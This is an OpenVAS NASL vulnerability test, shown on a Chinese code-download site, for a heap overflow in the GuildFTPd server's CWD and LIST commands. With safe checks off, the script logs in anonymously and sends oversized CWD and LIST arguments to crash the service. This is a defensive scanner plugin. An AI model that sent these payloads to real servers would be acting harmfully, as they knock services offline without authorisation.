⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 gb_guildftpd_heap_bof_vuln.nasl

📁 漏洞扫描源码,可以扫描linux,windows,交换机路由器
💻 NASL
字号:
################################################################################ OpenVAS Vulnerability Test# $Id: gb_guildftpd_heap_bof_vuln.nasl 0345 2008-10-21 10:37:32Z oct $## GuildFTPd CWD and LIST Command Heap Overflow Vulnerability## Authors:# Veerendra GG <veerendragg@secpod.com>## Copyright:# Copyright (c) 2008 Intevation GmbH, http://www.intevation.net## This program is free software; you can redistribute it and/or modify# it under the terms of the GNU General Public License version 2# (or any later version), as published by the Free Software Foundation.## This program is distributed in the hope that it will be useful,# but WITHOUT ANY WARRANTY; without even the implied warranty of# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the# GNU General Public License for more details.## You should have received a copy of the GNU General Public License# along with this program; if not, write to the Free Software# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.###############################################################################if(description){  script_id(800114);  script_version("$Revision: 1.0 $");  script_cve_id("CVE-2008-4572");  script_bugtraq_id(31729);  script_name(english:"GuildFTPd CWD and LIST Command Heap Overflow Vulnerability");  desc["english"] = "  Overview: This host is running GuildFTPd FTP Server which is prone to Heap  Overflow Vulnerability.  Vulnerability Insight:  The flaw exists due to boundary error while processing malformed arguments  passed to a CWD and LIST commands.  Impact:  Successful exploitation allows attackers to execute arbitrary code through  specially crafted CWD and LIST command, which can also crash the affected  application.  Impact Level: Application  Affected Software/OS:  GuildFTPd Version 0.999.14 and prior on Windows (Any).  Fix: No solution/patch is available as on 21st October, 2008. Information  regarding this issue will updated once the solution details are available.  For updates refer, http://www.guildftpd.com/  References:  http://milw0rm.com/exploits/6738  http://secunia.com/advisories/32218/  http://www.frsirt.com/english/advisories/2008/2794  CVSS Score:    CVSS Base Score     : 6.3 (AV:N/AC:M/Au:SI/C:N/I:N/A:C)    CVSS Temporal Score : 5.7  Risk factor: High";  script_description(english:desc["english"]);  script_summary(english:"Check for the version of GuildFTPd Server");  script_category(ACT_MIXED_ATTACK);  script_copyright(english:"Copyright (C) 2008 Intevation GmbH");  script_family(english:"Denial of Service");  script_dependencies("find_service.nes");  script_require_ports("Services/ftp", 21);  exit(0);}include("ftp_func.inc");include("version_func.inc");port = get_kb_item("Services/ftp");if(!port){  port = 21;}if(!get_port_state(port)){  exit(0);}soc = open_sock_tcp(port);if(!soc){  exit(0);}banner = recv(socket:soc, length:1024);if("GuildFTPd" >!< banner){  close(soc);  exit(0);}if(safe_checks()){  guildVer = eregmatch(pattern:"Version ([0-9.]+)", string:banner);  if(guildVer != NULL)  {    # Check for GuildFTPd Version <= 0.999.14    if(version_is_less_equal(version:guildVer[1], test_version:"0.999.14")){      security_hole(port);    }  }  close(soc);  exit(0);}if(ftp_authenticate(socket:soc, user:"anonymous", pass:"anonymous")){  send(socket:soc, data:string("cwd ", crap(data:"/.", length:200), "\n"));  recv(socket:soc, length:1024);  send(socket:soc, data:string("list ", crap(data:"X", length:100), "\r\n"));  recv(socket:soc, length:1024);  sleep(10);  close(soc);  soc = open_sock_tcp(port);  if(!recv(socket:soc, length:1024))  {    security_note(data:string("GuildFTPd Server service has been crashed on the" +                              "system.\nRestart the service to resume normal operations."),                  port:port);    security_hole(port);  }  close(soc);}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -